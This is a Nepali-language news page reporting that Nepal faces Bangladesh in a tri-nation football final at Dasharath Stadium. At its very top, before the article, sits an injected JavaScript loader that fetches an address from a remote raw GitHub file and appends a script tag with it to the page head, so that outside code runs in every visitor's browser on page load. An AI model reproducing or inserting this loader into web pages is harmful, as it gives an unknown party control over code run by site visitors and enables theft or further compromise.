;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); त्रिदेशीय फुटबलमा नेपालले र बङ्गलादेशबीच फाइनल खेल हुदै – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • त्रिदेशीय फुटबलमा नेपालले र बङ्गलादेशबीच फाइनल खेल हुदै
अन्तर्राष्ट्रिय

त्रिदेशीय फुटबलमा नेपालले र बङ्गलादेशबीच फाइनल खेल हुदै

चैत १६,
काठमाण्डाै । त्रिदेशीय कप फुटबल अन्तर्गत आज फाइनल खेल हुँदैछ । दशरथ रङ्गशालामा हुने फाइनल खेलमा नेपालले बङ्गलादेशसँग बेलुका साढे ५ बजे खेल्नेछ ।

प्रतियोगितामा नेपाल दोस्रो स्थानमा रहँदै फाइनल पुगेको हो । बङ्गलादेश भने शीर्ष स्थानमा रहेर फाइनलमा पुगेको हो ।

आजको खेलमा गोल गर्दै उपाधि आफ्नो पोल्टामा पार्ने नेपालको दाउ छ । लिग चरणको भेटमा नेपाल र बङ्गलादेशले गोलरहित बराबरी खेलेका थिए । यस्तै नेपालले पछिल्लो ७ अन्तर्राष्ट्रिय खेलमा गोल गर्न सकेको छैन।

बङ्गलादेशका मुख्य प्रशिक्षक जेम्स डेले फाइनल खेल प्रतिस्पर्धात्मक हुने बताएका छन् ।

 

फेसबुक प्रतिक्रियाहरु